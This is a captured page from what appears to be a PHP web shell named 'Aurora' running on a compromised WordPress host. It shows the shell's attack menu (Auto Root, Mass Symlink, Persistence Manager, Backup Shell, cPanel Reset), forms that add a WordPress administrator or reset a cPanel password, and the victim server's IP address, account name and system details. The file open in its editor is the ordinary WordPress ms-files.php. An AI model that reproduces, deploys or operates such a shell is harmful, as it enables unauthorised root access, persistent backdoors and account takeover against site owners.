Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
PHP.ini
Mass Symlink
Backup Shell
Persistence Manager
Server: LiteSpeed
IP: 103.247.8.210
User: bumiba56 (1550)
System: Linux papandayan.iixcp.rumahweb.net 4.18.0-477.13.1.lve.1.el8.x86_64 #1 SMP Mon Jul 17 15:05:09 EDT 2023 x86_64
PHP: 7.4.33
Current Path: /home/bumiba56/public_html/wp-includes
Root
home
bumiba56
public_html
wp-includes
Upload
New Folder
New File
Hidden Folder
Create Hidden Directory
Directory Name
Name
Size
Permissions
Actions
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: ms-files.php
<?php /** * Multisite upload handler. * * @since 3.0.0 * * @package WordPress * @subpackage Multisite */ define( 'SHORTINIT', true ); require_once dirname( __DIR__ ) . '/wp-load.php'; if ( ! is_multisite() ) { die( 'Multisite support not enabled' ); } ms_file_constants(); error_reporting( 0 ); if ( '1' == $current_blog->archived || '1' == $current_blog->spam || '1' == $current_blog->deleted ) { status_header( 404 ); die( '404 — File not found.' ); } $file = rtrim( BLOGUPLOADDIR, '/' ) . '/' . str_replace( '..', '', $_GET['file'] ); if ( ! is_file( $file ) ) { status_header( 404 ); die( '404 — File not found.' ); } $mime = wp_check_filetype( $file ); if ( false === $mime['type'] && function_exists( 'mime_content_type' ) ) { $mime['type'] = mime_content_type( $file ); } if ( $mime['type'] ) { $mimetype = $mime['type']; } else { $mimetype = 'image/' . substr( $file, strrpos( $file, '.' ) + 1 ); } header( 'Content-Type: ' . $mimetype ); // Always send this. if ( false === strpos( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS' ) ) { header( 'Content-Length: ' . filesize( $file ) ); } // Optional support for X-Sendfile and X-Accel-Redirect. if ( WPMU_ACCEL_REDIRECT ) { header( 'X-Accel-Redirect: ' . str_replace( WP_CONTENT_DIR, '', $file ) ); exit; } elseif ( WPMU_SENDFILE ) { header( 'X-Sendfile: ' . $file ); exit; } $last_modified = gmdate( 'D, d M Y H:i:s', filemtime( $file ) ); $etag = '"' . md5( $last_modified ) . '"'; header( "Last-Modified: $last_modified GMT" ); header( 'ETag: ' . $etag ); header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + 100000000 ) . ' GMT' ); // Support for conditional GET - use stripslashes() to avoid formatting.php dependency. $client_etag = isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) ? stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ) : false; if ( ! isset( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ) ) { $_SERVER['HTTP_IF_MODIFIED_SINCE'] = false; } $client_last_modified = trim( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ); // If string is empty, return 0. If not, attempt to parse into a timestamp. $client_modified_timestamp = $client_last_modified ? strtotime( $client_last_modified ) : 0; // Make a timestamp for our most recent modification... $modified_timestamp = strtotime( $last_modified ); if ( ( $client_last_modified && $client_etag ) ? ( ( $client_modified_timestamp >= $modified_timestamp ) && ( $client_etag == $etag ) ) : ( ( $client_modified_timestamp >= $modified_timestamp ) || ( $client_etag == $etag ) ) ) { status_header( 304 ); exit; } // If we made it this far, just serve the file. readfile( $file ); flush();